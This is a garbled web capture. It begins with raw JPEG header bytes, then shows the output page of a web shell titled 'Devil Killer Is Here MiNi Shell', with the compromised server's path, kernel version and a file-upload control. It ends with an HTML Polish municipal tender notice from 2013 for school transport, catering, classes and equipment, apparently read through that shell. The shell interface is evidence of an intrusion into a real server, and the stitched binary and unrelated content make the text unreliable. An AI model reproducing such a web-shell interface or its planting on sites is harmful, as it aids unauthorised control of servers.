JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130822/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130822/167461-N-2013.html

<p class="kh_header"><b>Czerwińsk nad Wisłą: Świadczenie usług transportu, kateringu, dostawy sprzętu i pozostałych usług edukacyjnych przy realizacji  projektu Dziś mamy szansę na jutro w ramach programu Operacyjnego Kapitał Ludzki współfinansowanego ze środków Europejskiego Funduszu Społecznego</b><br>
<b>Numer ogłoszenia: 167461 - 2013; data zamieszczenia: 22.08.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Czerwińsk nad Wisłą , ul. Wł. Jagiełły 16, 09-150 Czerwińsk nad Wisłą, woj. mazowieckie, tel. 024 2315075, faks 024 2315199.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ugczerwinsk.bip.org.pl/</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> www.ugczerwinsk.bip.org.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług transportu, kateringu, dostawy sprzętu i pozostałych usług edukacyjnych przy realizacji  projektu Dziś mamy szansę na jutro w ramach programu Operacyjnego Kapitał Ludzki współfinansowanego ze środków Europejskiego Funduszu Społecznego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest świadczenie usług transportowych, kateringowych, dostawa sprzętu oraz usługi edukacyjne w ramach projektu Dziś mamy szanse na jutro współfinansowanego ze środków Unii Europejskiej - Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki Priorytet IX Rozwój wykształcenia i kompetencji w regionach Działanie 9.1 Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty Poddziałanie 9.1.2 

2. Przedmiot zamówienia podzielony jest na pięć części:
1) Część Nr 1 - Przedmiot zamówienia obejmuje realizację usługi transportu uczniów ze szkół objętych projektem do miejsc zamieszkania, po zakończeniu zajęć w ramach projektu (tj. od ok. 16:00).
- Przewidywana tygodniowa liczba kilometrów - 500
- Przewidywana łączna liczba kilometrów nie może przekroczyć 15.000 km.
Wykonawca zobowiązany jest w swojej cenie ofertowej skalkulować :
- Koszt ubezpieczenia przewożonych uczniów od następstw nieszczęśliwych wypadków
- Koszt sprzątania udostępnionych środków transportu
- Koszt własnego ubezpieczenia przewoźnika z tytułu OC deliktowego 

2) Część Nr 2 - Przedmiot zamówienia obejmuje zakup i dostawę posiłków dla uczniów do szkół objętych projektem wg szczegółowego harmonogramu ustalonego z Zamawiającym. 
- W skład jednego zestawu posiłkowego wchodzić musi napój (soczek) oraz kanapka. Zalecana jest zmiana (urozmaicenie) rodzajów napojów i rodzajów kanapek w okresach tygodniowych.
- Wykonawca dostarcza zamiennie w ciągu tygodnia: kanapki z masłem i szynką lub kiełbasą, Kanapki z masłem i serem żółtym z dodatkiem warzywa tj. sałaty zielonej/ogórka/pomidora/papryki
- Minimalne wartości wagowe: bułka/chleb-50g, ser żółty: 20-25g, szynka: 20-25g, kiełbasa: 20-25g,masło: ok 10g, napój owocowy niegazowany o zawartości soku min. 30%
- Tygodniowa liczba zestawów - 388 sztuk
Łącznie w ramach zamówienia Zamawiający planuje zakup nie więcej niż 12028 sztuk.
- Przedmiot zamówienia obejmuje zakup (przygotowanie) posiłków oraz ich dostarczanie do poszczególnych szkół objętych projektem w ilościach i terminach uzgodnionych z Zamawiającym.
- Rozliczenia będą dokonywane w cyklu miesięcznym na podstawie ceny jednostkowej za zestaw pomnożonej przez liczbę dostarczonych w danym miesiącu zestawów posiłkowych.

3) Część Nr 3 - Przedmiot zamówienia obejmuje prowadzenie zajęć:
a.	Rozwijających z:
- matematyki - 60h zajęć/grupę, dla 4 grup. 
- przyrody - 60h zajęć/grupę, dla 1 grupy.
- fizyki - 60h zajęć/grupę, dla 4 grup. 
- biologii - 60h zajęć/grupę, dla 4 grup.
- geografii - 60h zajęć/grupę, dla 4 grup.
- chemii - 60h zajęć/grupę, dla 4 grup.
- języka angielskiego - 90h zajęć/grupę z modułem wspomagającym udostępnionym na platformie elerningowej (min. 10h/uczestnika), dla 6 grup. Wykonawca zobowiązany jest do dodatkowego wyposażenia uczestników zajęć w podręczniki i słowniki na własność oraz do organizacji i udostępnienia uczestnikom loginów i haseł do internetowej platformy nauczania zdalnego, na której realizowany będzie komponent elearningowy zajęć na okres realizacji zajęć i kolejnych 2 lat po ich zakończeniu.
- języka angielskiego i niemieckiego - 120h zajęć/grupę z modułem wspomagającym udostępnionym na platformie elerningowej (min. 15h/uczestnika), zakończonych egz. telc (lub równoważnego), dla 3 grup. Wykonawca zobowiązany jest do dodatkowego wyposażenia uczestników zajęć w podręczniki i słowniki na własność oraz do organizacji i udostępnienia uczestnikom loginów i haseł do internetowej platformy nauczania zdalnego na której realizowany będzie komponent elearningowy zajęć na okres realizacji zajęć i kolejnych 2 lat po ich zakończeniu.

b.	wyrównujących z:
- matematyki - 30h zajęć/grupę, dla 5 grup 
- języka polskiego - 30h zajęć/grupę, dla 4 grup. 

c.	z zakresu wsparcia psychologicznego: koncentracja na zadaniu/zastępowanie agresji - 15h/gr dla 3 grup. 

d.	z zakresu doradztwa zawodowego:
- grupowe - 15 godzin dla każdej grupy - dla 1 grupy uczniów. 
- indywidualne  - 3 godziny dla każdej osoby - dla 12 uczniów 
e.	z zakresu logopedii - 60h/grupę dla  3 grup.


4) Część Nr 4 - Przedmiot zamówienia obejmuje prowadzenie zajęć rozwijających i wyrównujących z informatyki, w tym:
- zajęcia rozwijające - 60h zajęć/grupę, dla 5 grup. 
- zajęcia rozwijające - 120h zajęć/grupę, z modułem wspomagającym udostępnionym na platformie elerningowej (min. 5h/uczestnika), zakończonych egz. ecdl-start (lub równoważnego), dla 3 grup. Wykonawca zobowiązany jest do dodatkowego wyposażenia uczestników zajęć w podręczniki na własność oraz do organizacji i udostępnienia uczestnikom loginów i haseł do internetowej platformy nauczania zdalnego na której realizowany będzie komponent elearningowy zajęć.


Zajęcia będą się odbywać w średniej częstotliwości:
- dla zajęć 120 i 90h /grupę - 4 godziny tygodniowo
- dla zajęć 60 /grupę - 2 godziny tygodniowo
- dla zajęć 30 /grupę - 1 godzina tygodniowo
- dla zajęć 10  i 15/grupę - w blokach 2 oraz 3-godzinnych

Zajęcia prowadzone będą w następujących szkołach:
- Gimnazjum w Czerwińsku nad Wisłą
- Szkoła Podstawowa w Grodźcu;

Przez godzinę lekcyjną Zamawiający rozumie jednostkę w wymiarze 45 minut, za wyjątkiem zajęć logopedycznych dla których wymiar 1 godziny zajęć wynosi 60 minut. 

5) Część Nr 5 - Przedmiot zamówienia obejmuje dostawę następującego sprzętu dla potrzeb prowadzenia zajęć:
a.	Tablica interaktywna - szt 2
b.	Projektor multimedialny -  szt 2
c.	Laptop z systemem operacyjnym i oprogramowaniem Office - szt 2
d.	Ekran rozwijany ze statywem  (do projekcji z projektora) - szt 2

Szczegółowa specyfikacja wymagań minimalnych dotyczących pozycji a. b. i c. zawiera załącznik nr 7 do siwz.
		
- Wszystkie dostarczone sztuki sprzętu muszą być fabrycznie nowe, a wszystkie urządzenia muszą posiadać atesty i certyfikaty dopuszczające do użytku w szkole
- Wykonawca jest zobowiązany by zgłosić Zamawiającemu dostawę najpóźniej na 2 dni robocze przed terminem
- Koszty dostawy ponosi Wykonawca
- W cenie dostawy Wykonawca zobowiązany jest zawrzeć zapoznanie wyznaczonego pracownika danej placówki ze sprzętem (sprawdzenie poprawności funkcjonowania)
- Dostawa wszystkich elementów zamówienia musi nastąpić ni później niż w ciągu 14 dni od podpisania umowy


3. Zamawiający zastrzega sobie prawo do:
1) zmiany ilości grup,
2) zmiany ilości uczniów w poszczególnych grupach, średnia liczba uczniów w grupie to 10 osób
3) zmiany ilości godzin zajęć lekcyjnych w poszczególnych grupach lub szkołach, z zachowaniem łącznego wymiaru godzin lekcyjnych dla poszczególnych części zamówienia. przy zachowaniu cen jednostkowych za 1 godzinę lekcyjną danego rodzaju, określonych przez Wykonawcę w ofercie.
4) zmiany (zmniejszenia) liczby posiłków w zależności od liczby uczestników poszczególnych zajęć. 
5) zmiany tygodniowej liczby kilometrów transportu uczniów w zależności od ostatecznego harmonogramu prowadzenia zajęć w projekcie
4. Zajęcia odbywać się będą w salach dydaktycznych w/w placówek, wyposażonych w miejsca do siedzenia, pisania i prowadzenia zajęć, przystosowanych dla odpowiedniej liczby uczestników, wyposażone w odpowiedni sprzęt techniczno-dydaktyczny. Pomieszczenia będą spełniać wymogi BHP, akustyczne, oświetleniowe, w okresie zimowym ogrzewane, posiadające zaplecze sanitarne.
5. Zajęcia rozwijające i kompensacyjne prowadzone będą od poniedziałku do piątku w godzinach
od 8.00 do 16.00 zgodnie z potrzebami i organizacją pracy placówki oświatowej. Szczegółowe
harmonogramy zajęć w poszczególnych placówkach oświatowych ustalone zostaną na etapie realizacji zamówienia w porozumieniu z Dyrektorami szkół..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.53.32.00-1, 80.53.32.00-1, 30.20.00.00-1, 55.52.40.00-9, 60.10.00.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Wykonawca składając ofertę zobowiązany jest do wniesienia wadium przed upływem terminu
składania ofert.
2. Wadium w wysokości:
a) 1000 zł (słownie: jeden tysiąc złotych 00 gr) dla Części nr 1 zamówienia 
b) 1000 zł (słownie: jeden tysiąc złotych 00 gr) dla Części nr 2 zamówienia
c) 2500 zł (słownie: dwa tysiące pięćset złotych 00 gr) dla Części nr 3 zamówienia
d) 1500 zł (słownie: tysiąc pięćset złotych 00 gr) dla Części nr 4 zamówienia

Wykonawca wnosi w jednej lub kilku następujących formach:
1) pieniądzu,
2) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej,
z tym, że poręczenie jest zawsze poręczeniem pieniężnym,
3) gwarancjach bankowych,
4) gwarancjach ubezpieczeniowych,
5) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2
ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju
Przedsiębiorczości.
3. Zamawiający wykluczy Wykonawcę z postępowania w przypadku, gdy:
1) oferta nie będzie zabezpieczona wadium przez cały okres związania ofertą, w tym
również na przedłużony okres związania ofertą,
2) wadium zostało wniesione w innej formie lub w mniejszej wysokości niż określił
Zamawiający w pkt 2.
4. Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy:
Vistula Bank Spółdzielczy Nr  70901100050260045920000020   
Na przelewie należy umieścić adnotację: Wadium, Znak sprawy: RRG.271.6.2013 - Część
zamówienia nr.
Datą wniesienia wadium jest data uznania rachunku Zamawiającego, a nie data wydania dyspozycji przelewu, dlatego Wykonawca powinien uwzględnić potrzebny czas, który upływa od momentu wydania polecenia przelewu do momentu uznania rachunku Zamawiającego.
5. W przypadku wnoszenia wadium w formie określonej w pkt 2 ppkt 2) - 5), Wykonawca
w ofercie składa w zależności od tego, co wynika z treści złożonego dokumentu, oryginał lub kopię dokumentu (potwierdzoną za zgodność w sposób określony w pkt 7-9
Części V SIWZ) potwierdzające wniesienie wadium. Z uwagi na obowiązek zwrotu przez Zamawiającego wadium oraz przechowywania ofert w sposób gwarantujący ich
nienaruszalność, Wykonawca w przypadku załączenia do oferty oryginału dokumentu
potwierdzającego wniesienie wadium powinien złożyć dokument w dwóch formach:
1) oryginału, który nie będzie w sposób trwały związany z ofertą, np. w dodatkowej
kopercie,
2) kopii poświadczonej przez Wykonawcę za zgodność z oryginałem (zgodnie z pkt 7-9
Części V SIWZ), którą można w sposób trwały związać z ofertą.
6. Dokument wadium wniesiony w formach określonych w pkt 2 ppkt 2) - 5) musi zawierać następujące elementy:
1) wskazanie gwaranta poręczenia/gwarancji - podmiot wystawiający poręczenie lub
gwarancję,
2) wskazanie podmiotu zlecającego ustanowienie poręczenia/gwarancji - Wykonawca,
w imieniu którego ustanowiono poręczenie/gwarancję,
3) wskazanie beneficjenta poręczenia/gwarancji - .
4) określenie nazwy zadania, którego dotyczy poręczenie/gwarancja,
5) zobowiązanie gwaranta do zapłacenia beneficjentowi kwoty poręczenia/gwarancji -
Gwarant musi oświadczyć, że zapłaci beneficjentowi kwotę gwarancji/poręczenia
w przypadku zaistnienia okoliczności określonych w art. 46 ust. 4a i 5 Pzp,
6) określenie kwoty poręczenia/gwarancji - kwota wadium nie może być mniejsza niż
kwota określona w pkt 2,
7) określenie terminu ważności poręczenia/gwarancji - musi obejmować okres:
a) począwszy od upływu terminu składania ofert, który został określony pkt 8
Części IX SIWZ, a w przypadku jego zmiany, począwszy od upływu aktualnie
obowiązującego terminu składania ofert,
b) aż do upływu ostatniego dnia terminu związania ofertą, który został określony
w pkt 1 Części IX SIWZ.
8) bezwarunkowość dysponowania poręczeniem/gwarancją - Poręczyciel lub gwarant
zobowiązany jest do niezwłocznego przekazania kwoty poręczenia/gwarancji na
konto wskazane przez beneficjenta, na pierwsze żądanie beneficjenta zawierające
oświadczenie, że kwota jest mu należna z powodu zaistnienia okoliczności
określonych w art. 46 ust. 4a i 5 Pzp,
9) nieodwołalność poręczenia/gwarancji - Gwarant nie może odwołać zobowiązania wynikającego z udzielonego poręczenia/gwarancji,
10) określenie prawa i miejsca rozstrzygania sporów dotyczących poręczenia/gwarancji - wszelkie spory dotyczące poręczenia/gwarancji rozstrzygane będą w oparciu o prawo obowiązujące na terytorium Rzeczypospolitej Polskiej,
11) określenie miejsca wykonalności praw z poręczenia/gwarancji - prawa z
poręczenie/gwarancji muszą być wykonalne na terytorium Rzeczypospolitej Polskiej.
Uwaga
Poręczenie/gwarancja o treści niezgodnej z postanowieniami pkt 6 lub zawierająca postanowienia ograniczające odpowiedzialność Gwaranta wobec Beneficjenta, jest równoznaczne z nie wniesieniem wadium i skutkuje wykluczeniem Wykonawcy.
7. Zamawiający zatrzymuje wadium w przypadku wystąpienia okoliczności wskazanych w art. 46 ust. 4a i 5 Pzp.
8. Zamawiający zwraca wadium na zasadach określonych w art. 46 Pzp.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania. Zamawiający nie precyzuje warunku w tym zakresie. Ocena spełnienia warunku nastąpi według formuły spełnia/nie spełnia na podstawie zapisów zawartych w oświadczeniu Wykonawcy o braku podstaw do wykluczenia (Załącznik Nr 2 do SIWZ)</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony, jeżeli w złożonych dokumentach i oświadczeniach Wykonawca jednoznacznie wykaże, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres działalności jest krótszy, w tym okresie wykonał, a w przypadku świadczeń okresowych lub ciągłych również wykonuje usługi polegające na prowadzeniu następujących zajęć rozwijających i kompensacyjnych dla uczniów w szkołach publicznych:

1.2.1. Część Nr 3: 
a.	zajęcia z zakresu matematyki, biologii/przyrody, j.polskiego oraz fizyki  - dla co najmniej 3 grup uczniów (30 uczniów) z każdego przedmiotu, w wymiarze łącznym min. po 100h dla z każdego z tych przedmiotów
b.	zajęcia z zakresu języka angielskiego i/lub języka niemieckiego - dla co najmniej 3 grup uczniów (24 uczniów), w wymiarze min. 100h/grupę z wykorzystaniem modułu elerningowego na platformach do nauczania zdalnego (min. 5h/ucznia), zakończonych przeprowadzeniem egzaminu telc lub równoważnego
c.	zajęcia wsparcia psychologicznego, logopedii oraz doradztwa zawodowego - dla co najmniej 3 grup (30 uczniów) z każdego rodzaju, w łącznym wymiarze min. po 100h dla z każdego z tych rodzajów zajęć.

1.2.2. Część Nr 4:  
a. zajęcia z zakresu technik komputerowych (TIK) dla co najmniej 3 grup uczniów (24 uczniów), w wymiarze min. 100h/grupę z wykorzystaniem modułu elerningowego na platformach do nauczania zdalnego (min. 2h/ucznia), zakończonych przeprowadzeniem egzaminu ecdl/ecdl-Start lub równoważnego</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje warunku w tym zakresie. Ocena spełnienia warunku nastąpi według formuły spełnia/nie spełnia na podstawie zapisów zawartych w oświadczeniu Wykonawcy o braku podstaw do wykluczenia (Załącznik Nr 2 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek dotyczący osób zdolnych do wykonania zamówienia (dotyczy Części 3 i 4):
Warunek dotyczący osób zdolnych do wykonania zamówienia zostanie spełniony, jeżeli w złożonych dokumentach i oświadczeniach Wykonawca jednoznacznie wykaże, że dysponuje lub będzie dysponował osobami posiadającymi kwalifikacje do zajmowania stanowiska nauczyciela w szkołach (zgodnie z Rozporządzeniem Ministra Edukacji Narodowej z dnia 12 marca 2009 r. w sprawie szczegółowych kwalifikacji wymaganych od nauczycieli oraz określenia szkół i wypadków, w których można zatrudnić nauczycieli niemających wyższego wykształcenia lub ukończonego zakładu kształcenia nauczycieli),w ilościach wystarczających do sprawnej realizacji przedmiotu zamówienia. Ocena spełniania powyższego warunku nastąpi na podstawie przedłożonej przez Wykonawcę listy osób przewidzianych do wykonania zamówienia (Załącznik nr 5 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>6.1 Dotyczy zadań 3 i 4: Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca wykaże, że: posiada środki finansowe na rachunku lub zdolność kredytową w wysokości nie mniejszej niż 100 000,00 zł.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową innego podmiotu, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Inne dokumenty nie wymienione w ogłoszeniu znajdują się w SIWZ.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
